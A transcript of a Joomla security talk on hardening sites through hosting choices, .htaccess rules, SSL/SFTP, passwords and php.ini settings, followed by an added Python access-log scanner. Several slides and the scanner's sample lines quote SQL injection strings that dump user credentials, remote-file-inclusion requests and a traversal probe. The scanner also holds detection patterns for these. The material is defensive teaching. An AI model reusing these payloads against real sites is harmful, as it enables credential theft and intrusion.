
Security talk: Fortifying your Joomla! website

Published in: Technology
  • Very nice Radek! Thanks for sharing.

    Last day I should have cloned myself or something, missed so many good presentations.
  • The article, including the full .htaccess example, can be found here: http://sobi.it/jab10/p/security/


  1. Security talk: Fortifying your Joomla! Website
     http://dilbert.com/strips/comic/2004-01-11/
     Radek Suski, http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
  2. Where to start?
     - Long before you go on-line
  3. Choose the right hosting
  4. Choose the right components
  5. Inform yourself about good practices ....
  6. .... it means:
  7. You're right here :)
     Copyright 2010, Sigsiu.NET GmbH
  8. Choose the right host
     - Apache 2
  9. PHP 5
  10. MySQL 5
  11. htaccess support
  12. Safe Mode Off !!!
  13. Register Globals Off !!!
  14. Access via SFTP
  15. HTTPS/SSL support
  16. Choose the right components
     - Components published at the JED: http://extensions.joomla.org/
     - Check the Vulnerable Extensions List regularly: http://docs.joomla.org/Vulnerable_Extensions_List
  17. Installing Joomla!
  18. Typical hack attempt
     ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users /*
  19. The point is: be unconventional!
     - Default username is “Admin”
  20. User ID of the first super admin is 62
     index.php?option=com_vulnurable...&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62 ...
  21. Change the super admin user ID: http://sobi.it/SuperAdmin/62/
  22. Main problem: we have to deal with kids with too much time
     “A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief” - source
  23. Scriptkiddies
     - Are sometimes randomly successful
  24. Are ambitious
  25. In most cases cause “only” heavy load:
  26. Default Joomla! site:
     ( ~23 SQL queries executed + ~15 MB memory used + ~170,000 PHP instructions ) x up to 100 hack attempts per minute by scriptkiddies
  27. htaccess – powerful weapon
     .htaccess (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess
  28. Default Joomla! htaccess
  29. Prevent access to PHP files
     195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1" 404 95 "Mozilla/5.0"
  30. Forbid access from “dangerous” UA
     GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 "libwww-perl/5.829"
     GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1" 403 1029 "Mozilla/3.0 (compatible; Indy Library)"
     GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1" 403 1029 "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
  31. Prevent most common SQL injections
     2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx&id=1/**/union/**/select/**/1,concat(username,0x3a,password)...
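Slides 29 to 31 show the three request shapes the deck's .htaccess rules are meant to reject: a query parameter whose value is a remote URL, a request from one of the named download-tool user agents (libwww-perl, Indy Library, Wget), and a UNION/SELECT injection padded with /**/ comments or + signs. The following detector is an added example, not code from the talk or from Sigsiu.NET: it parses Apache combined-format access log lines (the format is an assumption), URL-decodes the request path, strips inline SQL comments, and tags each line with the patterns it matches, so a site owner can check the server log for the same traffic the .htaccess rules block. The sample log lines are constructed to mirror the slides' examples; hosts and domains are placeholders.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Apache "combined" log format (assumed; the slides show requests in this shape):
# host ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that starts with a URL: the remote-file-inclusion shape of slides 29 and 30.
RFI_RE = re.compile(r"[?&][^=&]*=https?://", re.I)
# UNION ... SELECT after comment stripping: the injection shape of slides 18, 20 and 31.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)
# Client strings named on slide 30; compared case-insensitively as substrings.
BAD_UA = ("libwww-perl", "Indy Library", "Wget")


def classify_request(line: str) -> Optional[dict]:
    """Parse one log line and tag it with the attack patterns it matches.

    Returns None for lines that are not in combined format, otherwise a dict
    with host, status, path and a (possibly empty) list of tags.
    """
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode %XX escapes and '+' so encoded payloads are inspected in clear text.
    decoded = unquote_plus(m["path"])
    # Remove inline SQL comments (/**/), the whitespace substitute seen on slide 31.
    stripped = re.sub(r"/\*.*?\*/", " ", decoded)

    tags = []
    if RFI_RE.search(decoded):
        tags.append("rfi")
    if "../" in decoded or "\x00" in decoded:  # traversal / null-byte truncation (slide 30)
        tags.append("traversal")
    if SQLI_RE.search(stripped):
        tags.append("sqli")
    ua = m["ua"].lower()
    if any(bad.lower() in ua for bad in BAD_UA):
        tags.append("bad-ua")
    return {"host": m["host"], "status": int(m["status"]), "path": m["path"], "tags": tags}


def scan_log(lines) -> list:
    """Classify every parseable line; lines that do not parse are skipped."""
    results = []
    for line in lines:
        entry = classify_request(line.rstrip("\n"))
        if entry is not None:
            results.append(entry)
    return results


# Constructed sample lines modelled on the slides' examples (hosts and domains are placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/May/2005:17:06:00 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://example.invalid/id1.txt? HTTP/1.1" 404 95 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [15/May/2005:17:06:01 +0200] "GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 "-" "libwww-perl/5.829"',
    '203.0.113.9 - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx&id=1/**/union/**/select/**/1,concat(username,0x3a,password)/**/from/**/jos_users HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [30/Apr/2008:15:39:00 +0200] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in scan_log(SAMPLE_LOG):
        if entry["tags"]:
            print(entry["host"], entry["status"], ",".join(entry["tags"]), entry["path"])
```

Run against a real access log by replacing SAMPLE_LOG with the file's lines. A 403 on a tagged line means the .htaccess rule already rejected the request; a 200 on a line tagged sqli or rfi is the case worth investigating, because the application, not the web server, answered it.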
  33. Disclose as little information as possible
  34. Admin Panel Log-In & FTP
  35. Who can see it?
  36. HTTPS/SSL & SFTP
     - Use SFTP instead of FTP
  37. Use HTTPS for log-in
  38. HTTPS/SSL & SFTP - Problems
     - The provider has to offer SSH/SFTP
  39. The provider has to offer SSL or an SSL proxy
  40. An invalid SSL certificate throws an error in the browser
  41. Valid SSL certificates are expensive
  42. HTTPS/SSL - Problems
     - Valid SSL certificates are expensive: https://www.startssl.com/
  43. Username & Password … once again
     The username is almost as important as the password
  44. Username & Password … once again
     Automatically generated password: k5dRGCUxGs
  45. Username & Password … once again
     If we can articulate something, we can remember it. https://pass.sigsiu.net/
  46. File permissions
     Very unlucky number: 777
  47. php.ini
     - Disable “dangerous” functions ??!!
       disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
  48. how can a function be dangerous ??
  49. Use open_basedir
  50. open_basedir = /path/to/www
  51. Is your computer safe?
     “There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.” - Brian Teeman
  52. But what if .... ?
     Backup, Backup, Backup ..... and one more time: Backup
  53. Thank you for your attention!
     http://www.Sigsiu.NET
     https://shop.Sigsiu.NET
     http://joomla.Sigsiu.NET
     http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
